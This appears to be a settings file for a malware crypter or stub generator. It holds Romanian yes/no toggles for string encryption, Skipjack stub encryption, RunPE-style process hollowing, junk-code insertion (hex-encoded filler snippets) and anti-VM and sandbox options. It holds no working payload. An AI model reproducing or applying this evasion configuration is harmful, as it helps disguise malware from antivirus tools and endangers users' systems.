[USG]
dSH=nu
scramble2=da
ultraScramble=nu
fm1=nu
fm2=nu
Mid$=da
Left$=da
Chr$=nu
LenB=da
Ucase$=da
Right$=da
Hex$=da
String$=da
jc=nu
scramble=da
RealApis=nu
FakeApis=nu
l1=PXAxCaNemK
l2=LtB7IUaXP8Nf
l3=U0GKndnyRINx
id1=82
id2=47
id3=55
rName=NnxUWQx2T5
rType=0
strEnc=Hybrid
apiEnc=None
randL=6
stubEnc=Skipjack
nStubs=1
ByteArr=M2
sSplit=M3
type1=RtlMoveMemory
type2=LoadLibrary
type3=Invoke
type4=K-RunPe
type7=APIuri
type5=LoadResData
randLev=1
rD=da
rUselessDec=da
rResTwo=da
sNTDLL=da
rReplAlt=nu
Res2=0
Res3=0
rA=da
genSandb=nu
rVM=nu
rS=da
drF=da
aHash=da
rG=nu
rF=da
rCompress=da
fCompilation=da
noMSG=nu
nDirE=nu
aCompile=nu
rReverse=da
Language1=1056
Language2=1025
Language3=1039
Use=una
Ascii=Chr$
Ascii2=&
poly=nu
frm=0
getdef=da
Obj=Main
delex=da
bas=0
ctl=5
pag=7
cls=0
bla1=nu
bla2=nu
bla3=nu
bla4=15
dim=19
sub=0
type=14
const=6
remZ=nu
emu=2072616E53203D2072616E4E20262072616E4E20262072616E4E
CAE=20205331203D205335202B2053330D0A20204966205331203D205334205468656E205336203D2053310D0A20205335203D205336202B2053350D0A20205337203D205332202B2053350D0A
Compile=NCo